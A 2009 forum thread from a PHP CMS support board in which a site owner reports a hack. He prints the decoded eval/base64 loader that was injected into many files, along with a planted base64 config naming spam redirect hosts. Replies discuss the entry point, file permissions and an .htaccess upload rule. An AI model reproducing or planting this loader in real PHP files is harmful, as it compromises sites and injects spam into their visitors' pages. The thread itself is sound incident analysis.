Ravens PHP Scripts: Forums


View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security Issues
Author Message

Joined: Sep 12, 2006
Posts: 58
Location: Dsm, IA

PostPosted: Thu Sep 03, 2009 6:47 pm Reply with quote

My site was just hacked with a large number of files containing
<?php /**/eval(base64_decode('aWYoZnV ... ')); ?>
at the top. I'll post the whole thing if needed, but decoded it come out to
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/xxx/public_html/includes/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php')){include_once('/home/xxx/public_html/includes/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

Wondering if this is an exploit in the fckeditor or something else? I'm running RN2.30.02, and I make sure I patch everything on the site as it comes. I already contacted my host, just trying to figure out how they got in. Confused
View user's profile Send private message Visit poster's website MSN Messenger
Former Moderator in Good Standing

Joined: Apr 30, 2004
Posts: 3221

PostPosted: Thu Sep 03, 2009 7:59 pm Reply with quote

Definitely start with your host and see whether you can get access logs to determine how they got in. It does look like FCKEditor could be an issue if its reading from that directory

Let us know if you need any help

- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
View user's profile Send private message Visit poster's website
Site Admin

Joined: Jun 04, 2004
Posts: 6433

PostPosted: Fri Sep 04, 2009 10:42 am Reply with quote

includes/fckeditor/editor/filemanager/browser/default/images/icons/32 shouldn't be writeable. If that php file is there, it's possible (if not likely) that there are security issues on the server (I've seen something like this happen before with an FTP security issue, and it affected every account on the server).

In the mean time, if you have access to your account logs, check that, but if it's a server issue, you won't find anything there...

I search, therefore I exist...
nukeSEO - nukeFEED - nukePIE - nukeSPAM - nukeWYSIWYG
View user's profile Send private message

PostPosted: Fri Sep 04, 2009 1:08 pm Reply with quote

Unfortunately the logs had rolled over so they couldn't look at the actual attack, I have the raw log from yesterday but haven't seen anything in it yet (lot in there). That directory isn't world writeable, after running a cmd via ssh I only found a few directories that are (used by clan roster, gallery2, vsp stats, open realty, all up to date). I'm going to go through and make sure those actually need to be writeable but fckeditor wasn't one of them.

I had upgraded to fckeditor which was the newest some time ago, but did find several files in there that shouldn't have been there. One had
ZGdxbg== = "d3VvbQ=="

dHQ= = "Wz5VRl9LRVlXT1JEPF0="
ZGd1cmw= = "aHR0cDovL3BlYXJjaC5uZXQvaW4uY2dpPzE1JnBhcmFtZXRlcj0ka2V5d29yZCZzZT0kc2Umc2VvcmVmPSVyZWYlJkhUVFBfUkVGRVJFUj0lc2VsZl91cmwlJmRlZmF1bHRfa2V5d29yZD0la3cl"
ZGd1aA== = "aHR0cDovL25vbXNhdDI0Lm5ldC87aHR0cDovL25zc2F0NC5jb20vO2h0dHA6Ly93cGxzYXQyNC5uZXQv"
a2Q= = Mg==
cHJs = MA==
c3A= = MzA=
c3Q= = "c3Ryb25nO2VtO2I7aTt1"
bWFya292 = MA==
ZGdibG8= = MQ==
ZnJi = MQ==
bWw= = NTA=
ZGdzcg== = MQ==
ZGdzdA== = MjQ=
ZGdmZA== = MA==
cXI= = "c2lkO3BocHNlc3NpZDtjYWtlcGhwO29zY3NpZDtwaHBraXRzaWQ7eGNpZDtzZXNzaW9uaWQ="
ZnI= = MA==
a3dy = MQ==
dGhlbWU= = ""
there was another that had tons of "spam related" words (blackjack, viagra, xanax, etc) and another was an swf binary. So at this point I'm guessing they were trying to add links to all the pages for spamming purposes, although I'm still not totally sure how they got in.

I've reverted fkceditor back to the version that came with 2.30.02, although it's a few versions behind so I don't know if that's a good idea. I did find that the owner had installed an old version of dolphin which has now been removed, but if they used that I don't understand why they would use the fckeditor directory as dolphin was on it's own in a subdirectory/for a subdomain.

Sorry for the long post. Do you think I should upgrade again to the newest fckeditor ( or is the version with rn (2.63) the safer choice at this point?

PostPosted: Fri Sep 04, 2009 6:41 pm Reply with quote

The upgrade for the latest FCKEditor probably hasn't been tested under RavenNuke. Yes, that could be the way they got in.

kguske is definitely the one to talk to, since he's integrating nukeWYSIWYG (FCKEditor) for RavenNuke

PostPosted: Fri Sep 04, 2009 9:34 pm Reply with quote

If you had FCKeditor, that works and is tested with RavenNuke (assuming it is configured correctly). It also contains some additional security features to prevent authorized uploads (if you used the version from nukeSEO or RN 2.3.2). But as I said earlier, this appears to have been done through another means. Even with 2.30, this shouldn't have been possible since even that version had features built in to prevent uploading executable files.

PostPosted: Fri Sep 04, 2009 10:46 pm Reply with quote

Yes I had the version from NukeSEO, and I've now upgraded back to it after removing all files. It's weird because I'm kinda wanting them to do it again, replacing the files isn't really an issue, I can just rsync back from known good files, I just really want to know how specifically they got in. Perhaps it was the dolphin install but that still bugs me why they'd use the fckeditor directory for all their files. Confused
Site Admin

Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam

PostPosted: Sat Sep 05, 2009 3:57 pm Reply with quote

They probably used that directory to keep you focused on finding a problem with FCKeditor that doesn't exist.
View user's profile Send private message Send e-mail
Spouse Contemplates Divorce

Joined: Jan 02, 2003
Posts: 2496

PostPosted: Sat Feb 13, 2010 12:01 pm Reply with quote

This is an old topic but worth a bump. An added measure of security is to limit the access (Assuming your on an apache web server) with .htaccess.


# Add Extensions as needed as shown
deny from all
<Files ~ "^\w+\.(gif|jpe?g|png|avi)$">
 order deny,allow
 allow from all

This will help to prevent double extension exploits such as php.jpg and will limit access to files with extensions in the array. IE images you want people to see! Maybe someone can improve on this but this is pretty universally excepted to work as it is.
View user's profile Send private message
RavenNuke(tm) Development Team

Joined: Dec 02, 2006
Posts: 1693
Location: Texas, USA

PostPosted: Sat Feb 13, 2010 12:17 pm Reply with quote

that's a pretty cool little snippet, thanks!
View user's profile Send private message Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security Issues

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum

Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
Forums ©